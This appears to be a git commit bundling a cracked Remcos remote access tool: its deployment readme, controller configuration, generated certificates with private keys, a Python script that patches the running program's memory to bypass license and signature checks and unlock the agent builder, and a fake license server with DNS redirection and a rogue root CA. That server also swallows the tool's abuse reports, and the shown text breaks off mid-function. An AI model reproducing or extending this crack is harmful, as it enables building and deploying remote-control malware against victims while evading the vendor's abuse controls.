initial commit

This commit is contained in:
i2p
2026-08-27 11:23:20 -06:00
commit e01482eee0
73 changed files with 817 additions and 0 deletions
Vendored
BIN
View File
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
+3
View File
@@ -0,0 +1,3 @@
REMCOS v1.7 Professional
THE APPLICATION NEEDS ADMIN PRIVILEGES TO RUN PROPERLY
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -0,0 +1,75 @@
______
(_____ \
_____) )_____ ____ ____ ___ ___
| __ /| ___ | \ / ___) _ \ /___)
| | \ \| ____| | | ( (__| |_| |___ |
|_| |_|_____)_|_|_|\____)___/(___/
© BreakingSecurity.net
************************
* Zip Password *
************************
Zip Password is: BreakingSecurity.net
************************
* License Activation *
************************
To activate your Remcos Professional Edition license
(not needed for Remcos Free Edition):
1) Open KeyGen.exe
2) Insert your BreakingSecurity.net registration email and password
3) Click "Generate Key"
4) Click "Activate Key"
5) License is activated automatically and immediately.
You should receive a confirmation email within a minute.
************************
* Quick Setup *
************************
This brief guide will help you out in establishing a successful connection using Remcos.
For more in-depth instructions, consult:
Instruction Manual:
https://BreakingSecurity.net/remcos/manual
VideoTutorials:
https://BreakingSecurity.net/tutorials
Support:
https://BreakingSecurity.net/support
1) INSTALL REMCOS
Remcos is portable and does not require an installation.
Just extract Remcos.exe file in any folder and execute it.
Zip Password is: BreakingSecurity.net
If later on you download a new Remcos update and want to keep all your settings,
just place the new Remcos.exe in the same folder.
2) OPEN LISTENING PORT
The first step to do is open a TCP port for Remcos Controller.
This port will be used to listen for incoming connections.
Go to Local Settings -> Connection
to add a listening port.
Make sure your firewall allows Remcos connection.
3) SETUP AGENT CONNECTION
Go to Agent Builder -> Connection
to specify where your Remcos Agent should connect.
You should enter the IP or DNS address and listening port of your Remcos Controller here.
4) BUILD AGENT
Go to Agent Builder -> Build
to build a Remcos Agent.
Deploy the agent to the remote system and execute it.
5) ESTABLISH CONNECTION
If the above steps were correctly done,
your new Remcos connection will popup in the Connections tab.
@@ -0,0 +1,110 @@
[Terms]
ShowTermsOfUsage=0
[Tip]
ListeningPort=0
AgentBuilder=0
AgentBuilderBuild=0
[Firewall]
CheckOnStartup=1
[Settings]
UserEmail=[email protected]
Language=English
AutoSaveOnExit=1
DisplayOfflineAgents=1
MoveHighlightedOnTop=1
HighlightOutdatedAgents=0
GroupView=1
chkLatencyOnHostConnection=1
chkUpdateOnStartup=1
chkPublicIPOnStartup=1
ConfirmUninstall=0
GeoIP=1
MinimizeToSysTray=0
PingHost=1
PingInterval=30
PingTimeout=30
VisualStyle=
DoubleClickAction=0
[FunctionsMenu]
ShowShortKeys=1
Categorized=1
[Ports]
NumberOfPorts=0
[Font]
Font=Arial
Size=8
[PreviewPanel]
Show=1
VideoFeed=1
[Toolbar]
Show=1
[StatBar]
ShowEverywhere=0
[EventLog]
Verbose=0
Sockets=0
AutoScroll=1
InvalidConnections=1
[Notifications]
Style=2
Timeout=10
[ActivityNotification]
Disconnection=0
UserActivity=0
WindowEnter=0
WindowTitles=notepad;google;
NotificationType=1
IdleTimeThreshold=1
[AutoTasks]
Enabled=0
FirstConnectionOnly=1
[Telegram]
BotActive=0
ChatID=
ConnNotification=1
[ShortcutButtons]
1=2
2=4
3=5
4=11
5=12
6=24
7=30
[IP_Blacklist]
Enabled=1
LogRepetitive=1
NumberOfIPs=0
[ColumnIndex]
Location=0
AssignedName=1
ComputerUser=2
OperativeSystem=3
Latency=4
ActiveWindow=5
Uptime=6
IdleTime=7
IpAddress=8
Port=9
RAM=10
CPU=11
Version=12
InstallTime=13
Mutex=14
UID=15
[ColumnWidth]
Location=100
AssignedName=100
ComputerUser=150
OperativeSystem=150
Latency=70
ActiveWindow=150
IdleTime=100
Uptime=100
IpAddress=100
Port=44
RAM=70
CPU=100
Version=70
InstallTime=100
Mutex=100
UID=100
@@ -0,0 +1,18 @@
-----BEGIN CERTIFICATE-----
MIIC8jCCAdqgAwIBAgIUIwMGQAbxdBWbFIO91vqxQ0j9RBAwDQYJKoZIhvcNAQEL
BQAwGTEXMBUGA1UEAwwOUmVtY29zIFRlc3QgQ0EwHhcNMjYwNDIxMjExMTE3WhcN
MzYwNDE4MjExMTE3WjAZMRcwFQYDVQQDDA5SZW1jb3MgVGVzdCBDQTCCASIwDQYJ
KoZIhvcNAQEBBQADggEPADCCAQoCggEBAK3JTJdWpB5YGSNkmyBi1wDZCC72Jquf
8mGHg51kt4otpvtlg/LPlUQ6jAba3FpFKUIsJ/0qX8DROraQ8aCpUCTiWUrtxS02
nXeZXiB2apfXO8sogjPmOD9jUURzvMTfga7lEMPgU75pb1DBTv+wB8Dl7UALZfnS
dJs7uvVD6ZTKuZNgVrEOfJUHhkB+FhJHJVVtaq4PgprRGWadYX+VI3EcZPWwFdCm
WI3lBmA86aknrhLQJKqrZutOdvQ4PEoJbjvCTODqoNsMT3mds7BmPcmoNQCWHQ+D
zJQnmmmcdUa7+UBNo5DsDkT/vfif4gJA+k7ETX2Xxl8fAv5C4vJE8ZcCAwEAAaMy
MDAwHQYDVR0OBBYEFPeHvg2zKcG9mZn04z0b4IpzrqejMA8GA1UdEwEB/wQFMAMB
Af8wDQYJKoZIhvcNAQELBQADggEBAD0Okkl4iWvM5KS4AAkfyKvw5vDzLpwO/jzp
LXGKjMK1QHcmB1PuJgIfYY+aORZaDgRa/2Ct4gegJ75LeSL95Iz9iwbQ6wT3hOea
unizoOPl78i4NIhfGk0LSRxKnEHU25w4HUoW9oXtbrFuhkJNhbXLb6UQ/bf9lpwc
Uyo88q1vIBZ3pJ7IYaw+YMPSK2D8u7gblMg1LTtmPe4VHOrYg96osuesMUqjWroB
WNTknBI6Noj9U4vSIQC1g0yfk0SCslTnCBP80EPAq1owkzF8LQcUf6e2NtILJSzT
3/cO2lEhF6Pewcf9+YStbvII5zXXqMSfKEZahZ6mJTfB/FUbNvE=
-----END CERTIFICATE-----
@@ -0,0 +1,28 @@
-----BEGIN PRIVATE KEY-----
MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQCtyUyXVqQeWBkj
ZJsgYtcA2Qgu9iarn/Jhh4OdZLeKLab7ZYPyz5VEOowG2txaRSlCLCf9Kl/A0Tq2
kPGgqVAk4llK7cUtNp13mV4gdmqX1zvLKIIz5jg/Y1FEc7zE34Gu5RDD4FO+aW9Q
wU7/sAfA5e1AC2X50nSbO7r1Q+mUyrmTYFaxDnyVB4ZAfhYSRyVVbWquD4Ka0Rlm
nWF/lSNxHGT1sBXQpliN5QZgPOmpJ64S0CSqq2brTnb0ODxKCW47wkzg6qDbDE95
nbOwZj3JqDUAlh0Pg8yUJ5ppnHVGu/lATaOQ7A5E/734n+ICQPpOxE19l8ZfHwL+
QuLyRPGXAgMBAAECggEAG5sz5NaJO54YYDGbHYnrSDcxwEQEiz7dQfZE8hENwZAp
oRsp2r3Jowz/MWzoPsQTHxqPP6gmOHsELfwtu1fUuLHm0qryp5Fax6TqpD2AsUjU
4XDjPgX+6Wgy1gI3T7mG4EGDEu/lCFph/xy2GpKGqMiIPPmSjseKaR5pPzeKjhgN
tIpyKUqrc5dV4KLB24zduSb+pBFLhmLnvxhAMaKcJO3PUcSm2aZkG0a0Qa1T4AIG
/Smc2BxCrpQpfazZeCefpUGLBXGImCBbjDoOgQi1cvSUuKqS0tkrR5TIKKgIZ7V8
fZU6fcbPwSzWKazjwQZyc+XvEkwqDQ6RLsiF25LgAQKBgQDUF5FzPjWTSIW78+0h
SIqTc8JiQvNuqCRy7AlZsUKu1BHpZEAzq85YompNK+nOIecL+WTf+s+vpopYh1xh
iOOZEyJGIOPFTXIbOG0HeHvqpIbOh9L4pm0H/FHTfgJNjPqMPeBeTmNvTBBenvdF
Q3yoL+M8KSwitT7IyrWjr8ARzwKBgQDRw5uTfOR3gWwMmEnQG7w17iRqPqb5Itgb
JqTVug5xzhuO/QLzPB/seBDmHPEA+IzJ/PH5GoUGNxbv0prCwzgh9Ox6g0JQ0uPz
KIcY7ebi/Ub7ZFISo0kstK+elwHd5Vkw/+SMIwa26DtjhJmX8anf5iX6cFdFJElz
cmUiC1p9uQKBgFNOhpUrpEObwtvWrhfatIPCfmG2RoP6i4aQbAPM+pJNPlPcStOA
8mYiNXrmesm6y1QKu7K2g4lM8x5e3Mx6xltEBrxhAtZm2yESAtFiY9oAkerhst50
EHOIimN2JVVswKUBUPX5+FipGezwp9OO9JHjbXAeA/YGFwkrhjkrOVhFAoGASD1f
VNnMLMPrnCLOONd0Z/ZNoDFXe7FeT2ttlRVwaA0dPI8x9uab7+ohl74b2cO/aMit
5KYXbd6HDaywE6b7q+YXktGlgwQ98L3iWNmFjGLBkU4pXbXSO402dh13TR3xK4jV
AtYFN/Sej1VZOBTH9g3iwm7x/yPSD+oznhfe4DECgYEAixrscj/7mcjY2GwwOhkd
MuEpTfQH23CpaP+5sqjlPRjbHn3nHm6BUVC+Z8vfP3jt6HPV/QcCqvkGGhVC/OqC
SwR/UQwuuwfSlN6cP+urwEQcs5gGHeyKu7ydycEpkG1A+S5/5WzLc49aXWbWwI5r
nDaWMQ07OhtWEkGW4r/MXh8=
-----END PRIVATE KEY-----
@@ -0,0 +1 @@
0A81D0AFDD39068AABD46C1EA996127D1994F7B2
@@ -0,0 +1,19 @@
-----BEGIN CERTIFICATE-----
MIIC8jCCAdqgAwIBAgIUIwMGQAbxdBWbFIO91vqxQ0j9RBAwDQYJKoZIhvcNAQEL
BQAwGTEXMBUGA1UEAwwOUmVtY29zIFRlc3QgQ0EwHhcNMjYwNDIxMjExMTE3WhcN
MzYwNDE4MjExMTE3WjAZMRcwFQYDVQQDDA5SZW1jb3MgVGVzdCBDQTCCASIwDQYJ
KoZIhvcNAQEBBQADggEPADCCAQoCggEBAK3JTJdWpB5YGSNkmyBi1wDZCC72Jquf
8mGHg51kt4otpvtlg/LPlUQ6jAba3FpFKUIsJ/0qX8DROraQ8aCpUCTiWUrtxS02
nXeZXiB2apfXO8sogjPmOD9jUURzvMTfga7lEMPgU75pb1DBTv+wB8Dl7UALZfnS
dJs7uvVD6ZTKuZNgVrEOfJUHhkB+FhJHJVVtaq4PgprRGWadYX+VI3EcZPWwFdCm
WI3lBmA86aknrhLQJKqrZutOdvQ4PEoJbjvCTODqoNsMT3mds7BmPcmoNQCWHQ+D
zJQnmmmcdUa7+UBNo5DsDkT/vfif4gJA+k7ETX2Xxl8fAv5C4vJE8ZcCAwEAAaMy
MDAwHQYDVR0OBBYEFPeHvg2zKcG9mZn04z0b4IpzrqejMA8GA1UdEwEB/wQFMAMB
Af8wDQYJKoZIhvcNAQELBQADggEBAD0Okkl4iWvM5KS4AAkfyKvw5vDzLpwO/jzp
LXGKjMK1QHcmB1PuJgIfYY+aORZaDgRa/2Ct4gegJ75LeSL95Iz9iwbQ6wT3hOea
unizoOPl78i4NIhfGk0LSRxKnEHU25w4HUoW9oXtbrFuhkJNhbXLb6UQ/bf9lpwc
Uyo88q1vIBZ3pJ7IYaw+YMPSK2D8u7gblMg1LTtmPe4VHOrYg96osuesMUqjWroB
WNTknBI6Noj9U4vSIQC1g0yfk0SCslTnCBP80EPAq1owkzF8LQcUf6e2NtILJSzT
3/cO2lEhF6Pewcf9+YStbvII5zXXqMSfKEZahZ6mJTfB/FUbNvE=
-----END CERTIFICATE-----
@@ -0,0 +1,5 @@
[v3_req]
subjectAltName=DNS:breakingsec.io,DNS:*.breakingsec.io,DNS:breakingsecurity.net,DNS:*.breakingsecurity.net,DNS:pro.ip-api.com,DNS:*.ip-api.com,DNS:localhost
basicConstraints=CA:FALSE
keyUsage=digitalSignature,keyEncipherment
extendedKeyUsage=serverAuth
@@ -0,0 +1,21 @@
-----BEGIN CERTIFICATE-----
MIIDdjCCAl6gAwIBAgIUCoHQr905Boqr1GweqZYSfRmU97IwDQYJKoZIhvcNAQEL
BQAwGTEXMBUGA1UEAwwOUmVtY29zIFRlc3QgQ0EwHhcNMjYwNDIxMjExMTE3WhcN
MzYwNDE4MjExMTE3WjAZMRcwFQYDVQQDDA5icmVha2luZ3NlYy5pbzCCASIwDQYJ
KoZIhvcNAQEBBQADggEPADCCAQoCggEBANT30Wpq71rgptJF/Np4NRrsMv8yABzm
1Ly8QXEtIDi2Ir7jynY3InMPXFy3arVHBwmwb5PsFKZyVTGVpqxfgBWprNa9QTkP
RMAaQKI6daWb4V0cmEsTYwSvxsbeCairOCYzmTwLffGV2DRQhnWavwKw8h+Bsym/
P2unzIrk0vlm4yJdkgBApIkKnT/i/s4tHMmy6NFfj8JKOxNloi4wzfCKzgDRsvcV
y+1hhrJ1kCaQ0EHolBjyHf2ILmdURV1FTTIar14id5lm9Rmoapk9IT3frW4CsDoZ
INSM24kHgWK0fFf5GD2/q0YGz4AAN7HMUqoDLxQgyvJvWs5xMNTJUCMCAwEAAaOB
tTCBsjCBggYDVR0RBHsweYIOYnJlYWtpbmdzZWMuaW+CECouYnJlYWtpbmdzZWMu
aW+CFGJyZWFraW5nc2VjdXJpdHkubmV0ghYqLmJyZWFraW5nc2VjdXJpdHkubmV0
gg5wcm8uaXAtYXBpLmNvbYIMKi5pcC1hcGkuY29tgglsb2NhbGhvc3QwCQYDVR0T
BAIwADALBgNVHQ8EBAMCBaAwEwYDVR0lBAwwCgYIKwYBBQUHAwEwDQYJKoZIhvcN
AQELBQADggEBAG6WlSlKUyj4G/cjD6mmz6o+Gr6/i9K3eYrIBm8fELQ+8gFdc8mx
1rHg1RGN0qqjhwXwThIdkZQzpWS//+q/unLQYrGbi/STpiEfcLOilWX9iR70vEox
mjQedc5oVUt/AHOisY7SoSnfo0Anoi4MAk5iPI1vWcgT99qcFDbL0avNoXI2wuul
ttNv2JchKvwsoA7Zzty6fhwOZLCe98nt233bwV+46BLCabfTCj6/j3VKvNxx6Lhr
ojpqv6a/glcOQ28V3+t03G6npLLfAlMqO1bfj9bBZSuvucqF3+mXdZn/4+92Pi0v
7/BzQjn2GxfJ2gPh/XOHRRXZplaLKoXL8pw=
-----END CERTIFICATE-----
@@ -0,0 +1,15 @@
-----BEGIN CERTIFICATE REQUEST-----
MIICXjCCAUYCAQAwGTEXMBUGA1UEAwwOYnJlYWtpbmdzZWMuaW8wggEiMA0GCSqG
SIb3DQEBAQUAA4IBDwAwggEKAoIBAQDU99Fqau9a4KbSRfzaeDUa7DL/MgAc5tS8
vEFxLSA4tiK+48p2NyJzD1xct2q1RwcJsG+T7BSmclUxlaasX4AVqazWvUE5D0TA
GkCiOnWlm+FdHJhLE2MEr8bG3gmoqzgmM5k8C33xldg0UIZ1mr8CsPIfgbMpvz9r
p8yK5NL5ZuMiXZIAQKSJCp0/4v7OLRzJsujRX4/CSjsTZaIuMM3wis4A0bL3Fcvt
YYaydZAmkNBB6JQY8h39iC5nVEVdRU0yGq9eIneZZvUZqGqZPSE9361uArA6GSDU
jNuJB4FitHxX+Rg9v6tGBs+AADexzFKqAy8UIMryb1rOcTDUyVAjAgMBAAGgADAN
BgkqhkiG9w0BAQsFAAOCAQEAW3LLdzDgNoktVDlSXSd9XHuMn+11jk1RIvKLr+Os
ZEKHNOxGoqXrj8H1wLLMP9F/zzz/Z9aCO1/djK2ByC6WGzudtI48vrPu4dB8Gx4h
aUfkC/XKavyTma6I/vd2xpUmNxQxQ/sm0LXAw/jWKCJh9tek/GL32Lsm1RVDY8QN
0l6fTz4D+AUoLTsKP0NV1WmjD9pIyJ2u9mwQzaFLgdiVZex1RXga5Wj9dKQ3pMhu
6ASCJ5zLadOA3kUcgYNhtGAk5TXlXKPGWqcVrzvoL8QqVNupIAe/6Jvy8yqQegYg
x3aaJd+f34WjOChrI2Y0JnaLBr5F6GMJN0hhbRpss8ESXA==
-----END CERTIFICATE REQUEST-----
@@ -0,0 +1,28 @@
-----BEGIN PRIVATE KEY-----
MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQDU99Fqau9a4KbS
RfzaeDUa7DL/MgAc5tS8vEFxLSA4tiK+48p2NyJzD1xct2q1RwcJsG+T7BSmclUx
laasX4AVqazWvUE5D0TAGkCiOnWlm+FdHJhLE2MEr8bG3gmoqzgmM5k8C33xldg0
UIZ1mr8CsPIfgbMpvz9rp8yK5NL5ZuMiXZIAQKSJCp0/4v7OLRzJsujRX4/CSjsT
ZaIuMM3wis4A0bL3FcvtYYaydZAmkNBB6JQY8h39iC5nVEVdRU0yGq9eIneZZvUZ
qGqZPSE9361uArA6GSDUjNuJB4FitHxX+Rg9v6tGBs+AADexzFKqAy8UIMryb1rO
cTDUyVAjAgMBAAECggEAJ8WMD1KfFpqjrNszKF2QlVGNCIl+6ebVzdVeZ1NlFBI3
lOyXb9JGFbTFq+7495enIdEYVUieZqMtc9Ady00eb207gPLhDlXiofmFHobKV74v
rSLc8hBRyptFBPiMVzp6hu/V6xe+UnKIaOSs56OZjlgbL3UaT26O2n0AvuOS3s5X
ln717Nx7L7CNC8+df7oEQ65rmfi8lh1h7Hvn2vDnb/EjFfGUYhlfc7Mc5PbR1NuB
zKYPhxe3Hh3+WXMnqil2asFP1+hv7UIXty2gAS3ybMDT5n/u1iy/gKy9apjF8acc
iB29tZzvMoXIFyONrnlCRK374cPEs1jqOJJmAp5PcQKBgQD9TCPcujuAlmi95o4a
qr4Oy0asR2DcqCMiKC1QxK/hLctPf8GmvnCyA89jew1/mdaWnEisvAb3nyuLPH4N
bC+tSDumlZ094ecJklH/CVVLePp9eH8X01Z3IaIFqv6zRuWcdu9dvVN0JF/cO3iB
6sdXZ+y/LxPEPvkeF2MBwQ1SqQKBgQDXPYWQdroHBC/cXwct0ilW38P0k8bhz/Yx
dPsxNBuzaQYr1ul4biexnrgMFLYsCoN+RYPfI7TIagKaGeI46w7LL4zxyosgn4H9
yIcnAErSQunRMwieZvpvBMJsIEtvPgbYB8/bBRAvh3RRpUxk2ZhC+6KBOBOlpRmg
ekzb9B9X6wKBgBd8wPKNvki9Kbc6MsEcRgVfKg19jOjJGoDnUtRjeJ+bvHeBtDY/
AHoxSkDCP00uuaw7j62cvdSmSMZfdJzQBFfAE+/tfagoU2Ea1Umd1u/ppuiNjNNr
wF/JmZmG8pkzIMVybd22WY+yc8UbKqB5YcSkGVrdBasz36u/pWmbOh4JAoGBAI/C
K389jSo6hazuW2EjSTEY60xjlyYjPA/0TgGjCA1gTBrjw7QH/sMHe222N6Zar1Cb
JWTX+FsTUwGR4CKb/JmA/OZRnXMAllXmpT5LV63vuzNanpsNtJ6J00FcoIWALBoF
vbJPQ2w7UFlnygphuuyiHPupdJXiG6evh74w4u5ZAoGBANGcigRGWXrjKBht5DgV
FWcLOqm5316NbwAbGxPEDY9N792fcT7OlaDkdxBWymDsB6l6DaaUI99WyPbO0X/T
a3G2zHcn2/x+pc7t7crdh2L5FbE/U5pYqOJw/WvoBVCjy+AsfNeoIGdKsOnF3m44
nM7a1ouNgDRFExgnPYEwDKai
-----END PRIVATE KEY-----
@@ -0,0 +1,95 @@
"""
Launch Remcos with SSL_CERT_FILE + apply IAT patches.
Run WHILE server_only.py is running in another terminal.
"""
import ctypes, ctypes.wintypes as wt, struct, subprocess, os, sys, time
PROCESS_ALL_ACCESS = 0x1F0FFF
PAGE_EXECUTE_READWRITE = 0x40
MEM_COMMIT, MEM_RESERVE = 0x1000, 0x2000
UNPACK_ADDR, UNPACK_SIG = 0x8EEED8, b'\x55\x8b\xec\x6a'
kernel32 = ctypes.WinDLL('kernel32', use_last_error=True)
OpenProcess = kernel32.OpenProcess; OpenProcess.restype = wt.HANDLE
ReadProcessMemory = kernel32.ReadProcessMemory; ReadProcessMemory.restype = wt.BOOL
WriteProcessMemory = kernel32.WriteProcessMemory; WriteProcessMemory.restype = wt.BOOL
VirtualAllocEx = kernel32.VirtualAllocEx; VirtualAllocEx.restype = wt.LPVOID
VirtualProtectEx = kernel32.VirtualProtectEx; VirtualProtectEx.restype = wt.BOOL
CloseHandle = kernel32.CloseHandle
def read_mem(h, addr, sz):
buf = ctypes.create_string_buffer(sz); n = ctypes.c_size_t(0)
return buf.raw[:n.value] if ReadProcessMemory(h, addr, buf, sz, ctypes.byref(n)) else None
def write_mem(h, addr, data):
old = wt.DWORD(0)
VirtualProtectEx(h, addr, len(data), PAGE_EXECUTE_READWRITE, ctypes.byref(old))
n = ctypes.c_size_t(0); buf = ctypes.create_string_buffer(data)
ok = WriteProcessMemory(h, addr, buf, len(data), ctypes.byref(n))
VirtualProtectEx(h, addr, len(data), old.value, ctypes.byref(old))
return ok and n.value == len(data)
def main():
d = os.path.dirname(os.path.abspath(__file__))
exe = os.path.join(d, "Remcos v7.2.2 Pro.exe")
# Set SSL env
ca = os.path.join(d, "certs", "ca_bundle.pem")
if os.path.exists(ca):
os.environ["SSL_CERT_FILE"] = ca
os.environ["SSL_CERT_DIR"] = os.path.join(d, "certs")
print(f"[+] SSL_CERT_FILE={ca}")
# Kill old
subprocess.run(['taskkill', '/F', '/IM', 'Remcos v7.2.2 Pro.exe'], capture_output=True)
time.sleep(1)
# Launch
proc = subprocess.Popen([exe], cwd=d)
pid = proc.pid; print(f"[+] PID {pid}")
h = None
for _ in range(30):
h = OpenProcess(PROCESS_ALL_ACCESS, False, pid)
if h: break
time.sleep(0.1)
if not h: print("[-] Can't open"); return
# Wait unpack
print("[*] Waiting for unpack...")
t0 = time.time()
while time.time() - t0 < 45:
if proc.poll() is not None: print("[-] Exited early"); CloseHandle(h); return
if read_mem(h, UNPACK_ADDR, 4) == UNPACK_SIG: break
time.sleep(0.05)
else: print("[-] Timeout"); CloseHandle(h); return
print(f"[+] Unpacked {time.time()-t0:.1f}s"); time.sleep(0.2)
# Stubs
page = VirtualAllocEx(h, None, 4096, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
stub = bytearray(32)
stub[0x00] = 0xC3 # ret
stub[0x04:0x07] = b'\xC2\x04\x00' # ret 4
stub[0x08:0x10] = b'\xB8\x01\x00\x00\x00\xC2\x18\x00' # CryptVerify -> TRUE
write_mem(h, page, bytes(stub))
# Exit hooks
for addr, off, name in [(0x9DF18C,0,"Halt"),(0x4C36428,4,"PostQuitMessage"),
(0xA1007C,4,"ExitProcess1"),(0x4C36590,4,"ExitProcess2"),(0x4C36AE8,4,"ExitProcess3")]:
write_mem(h, addr, struct.pack('<I', page+off)); print(f" [+] {name}")
# Crypto IAT
for addr in [0x9DF0F8, 0x4C364FC]:
write_mem(h, addr, struct.pack('<I', page+0x08)); print(" [+] CryptVerify IAT")
# Builder gate
write_mem(h, 0x983F9C, b'\x01'); print(" [+] Builder gate=1")
# TLS init
write_mem(h, 0x97126C, struct.pack('<I', 1)); print(" [+] TLS flag=1")
print(f"\n[+] Done. Remcos PID {pid}")
print("[*] Enter email in auth dialog. Server handles the rest.")
CloseHandle(h)
proc.wait()
if __name__ == "__main__": main()
@@ -0,0 +1,383 @@
"""
Standalone fake server + DNS redirect.
Stays running until you press Ctrl+C.
Launch Remcos/KeyGen yourself while this is running.
Run as Administrator!
"""
import http.server
import os
import socket
import socketserver
import ssl
import subprocess
import sys
import threading
import time
from datetime import datetime
from urllib.parse import urlparse, parse_qs
VERSION = "7.2.2"
SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
CERT_DIR = os.path.join(SCRIPT_DIR, "certs")
CA_CERT = os.path.join(CERT_DIR, "ca.crt")
CA_KEY = os.path.join(CERT_DIR, "ca.key")
SRV_CERT = os.path.join(CERT_DIR, "server.crt")
SRV_KEY = os.path.join(CERT_DIR, "server.key")
NRPT_BASE = r"HKLM:\System\CurrentControlSet\Services\Dnscache\Parameters\DnsPolicyConfig"
NRPT_GUIDS = [
("{b1a2c3d4-0001-aaaa-bbbb-000000000001}", [".breakingsec.io", "breakingsec.io"]),
("{b1a2c3d4-0001-aaaa-bbbb-000000000002}", [".ip-api.com", "pro.ip-api.com", "ip-api.com"]),
("{b1a2c3d4-0001-aaaa-bbbb-000000000003}", [".breakingsecurity.net", "breakingsecurity.net"]),
]
REDIRECT_DOMAINS = {"breakingsec.io", "www.breakingsec.io", "breakingsecurity.net",
"www.breakingsecurity.net", "pro.ip-api.com"}
REAL_DNS = "8.8.8.8"
GEO_RESPONSE = "\n".join([
"success", "US", "United States", "NA", "North America",
"CA", "California", "Los Angeles", "Los Angeles", "90001",
"34.0522", "-118.2437", "America/Los_Angeles",
"ISP", "ISP Corp", "AS0000", "1.2.3.4",
])
# ============================================================
# SSL Certs
# ============================================================
def generate_certs():
os.makedirs(CERT_DIR, exist_ok=True)
if os.path.exists(SRV_CERT) and os.path.exists(CA_CERT):
print("[*] Certs exist, reusing.")
return True
print("[*] Generating SSL certificates...")
try:
subprocess.run(["openssl", "req", "-x509", "-newkey", "rsa:2048", "-nodes",
"-keyout", CA_KEY, "-out", CA_CERT, "-days", "3650",
"-subj", "/CN=Remcos Test CA"], capture_output=True, check=True)
csr = os.path.join(CERT_DIR, "server.csr")
ext = os.path.join(CERT_DIR, "ext.cnf")
with open(ext, "w") as f:
f.write("[v3_req]\nsubjectAltName=DNS:breakingsec.io,DNS:*.breakingsec.io,"
"DNS:breakingsecurity.net,DNS:*.breakingsecurity.net,"
"DNS:pro.ip-api.com,DNS:*.ip-api.com,DNS:localhost\n"
"basicConstraints=CA:FALSE\nkeyUsage=digitalSignature,keyEncipherment\n"
"extendedKeyUsage=serverAuth\n")
subprocess.run(["openssl", "req", "-newkey", "rsa:2048", "-nodes",
"-keyout", SRV_KEY, "-out", csr, "-subj", "/CN=breakingsec.io"],
capture_output=True, check=True)
subprocess.run(["openssl", "x509", "-req", "-in", csr, "-CA", CA_CERT,
"-CAkey", CA_KEY, "-CAcreateserial", "-out", SRV_CERT, "-days", "3650",
"-extfile", ext, "-extensions", "v3_req"], capture_output=True, check=True)
print("[+] Certificates generated.")
return True
except Exception as e:
print(f"[-] Cert generation failed: {e}")
return False
def install_ca():
r = subprocess.run(["certutil", "-addstore", "-f", "Root", CA_CERT],
capture_output=True, text=True)
if r.returncode == 0:
print("[+] CA cert installed in trust store.")
else:
print(f"[-] CA install failed: {r.stderr[:100]}")
def remove_ca():
subprocess.run(["certutil", "-delstore", "Root", "Remcos Test CA"],
capture_output=True)
# ============================================================
# NRPT
# ============================================================
def setup_nrpt():
print("[*] Setting NRPT rules...")
for guid, domains in NRPT_GUIDS:
names_str = ",".join(f"'{d}'" for d in domains)
ps = f"""
$p = '{NRPT_BASE}\\{guid}'
New-Item -Path $p -Force | Out-Null
Set-ItemProperty -Path $p -Name 'Name' -Value @({names_str}) -Type MultiString
Set-ItemProperty -Path $p -Name 'GenericDNSServers' -Value '127.0.0.1' -Type String
Set-ItemProperty -Path $p -Name 'ConfigOptions' -Value 8 -Type DWord
Set-ItemProperty -Path $p -Name 'Version' -Value 2 -Type DWord
"""
r = subprocess.run(["powershell", "-Command", ps], capture_output=True, text=True, timeout=10)
if r.returncode == 0:
print(f" [+] {', '.join(domains)} -> 127.0.0.1")
else:
print(f" [-] {domains[0]}: {r.stderr.strip()[:80]}")
subprocess.run(["ipconfig", "/flushdns"], capture_output=True, timeout=10)
subprocess.run(["powershell", "-Command", "Clear-DnsClientCache; Register-DnsClient"],
capture_output=True, timeout=10)
def cleanup_nrpt():
for guid, _ in NRPT_GUIDS:
ps = f"Remove-Item -Path '{NRPT_BASE}\\{guid}' -Recurse -Force -ErrorAction SilentlyContinue"
subprocess.run(["powershell", "-Command", ps], capture_output=True, timeout=10)
subprocess.run(["ipconfig", "/flushdns"], capture_output=True, timeout=10)
# ============================================================
# DNS Server
# ============================================================
class DNSHandler(socketserver.BaseRequestHandler):
def handle(self):
data = self.request[0]
sock = self.request[1]
try:
domain = self._parse_domain(data).lower().rstrip(".")
redirect = any(domain == d or domain.endswith("." + d)
for d in REDIRECT_DOMAINS)
if redirect:
resp = self._build_response(data, "127.0.0.1")
sock.sendto(resp, self.client_address)
else:
fwd = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
fwd.settimeout(3)
fwd.sendto(data, (REAL_DNS, 53))
try:
r, _ = fwd.recvfrom(4096)
sock.sendto(r, self.client_address)
except socket.timeout:
pass
fwd.close()
except:
pass
def _parse_domain(self, data):
parts, idx = [], 12
while idx < len(data):
l = data[idx]
if l == 0: break
idx += 1
parts.append(data[idx:idx+l].decode("ascii", errors="replace"))
idx += l
return ".".join(parts)
def _build_response(self, query, ip):
resp = bytearray(query[:2]) + b'\x81\x80' + query[4:6] + b'\x00\x01\x00\x00\x00\x00'
idx = 12
while idx < len(query):
if query[idx] == 0:
idx += 5
break
idx += 1 + query[idx]
resp += query[12:idx]
resp += b'\xc0\x0c\x00\x01\x00\x01\x00\x00\x0e\x10\x00\x04'
resp += socket.inet_aton(ip)
return bytes(resp)
# ============================================================
# HTTP/HTTPS Server
# ============================================================
class FakeHandler(http.server.BaseHTTPRequestHandler):
def log_message(self, fmt, *args):
ts = datetime.now().strftime("%H:%M:%S")
print(f" [{ts}] {fmt % args}")
def send_text(self, text, code=200):
data = text.encode("utf-8")
self.send_response(code)
self.send_header("Content-Type", "text/plain")
self.send_header("Content-Length", str(len(data)))
self.send_header("Connection", "close")
self.end_headers()
self.wfile.write(data)
def route(self):
path = urlparse(self.path).path.lower()
host = self.headers.get("Host", "")
qs = parse_qs(urlparse(self.path).query)
print(f" -> {self.command} {self.path} (Host: {host})")
# Dump ALL headers for debugging
for h_name, h_val in self.headers.items():
print(f" {h_name}: {h_val}")
if "whitelist" in path:
print(f" <- Whitelist: EMPTY")
self.send_text("")
return
if "signalabuse" in path:
print(f" <- Abuse absorbed")
self.send_text("")
return
if "licpost" in path or ("keygen" in path and "lic" in path.lower()):
lic_raw = qs.get("LIC", [""])[0]
parts = lic_raw.split("|")
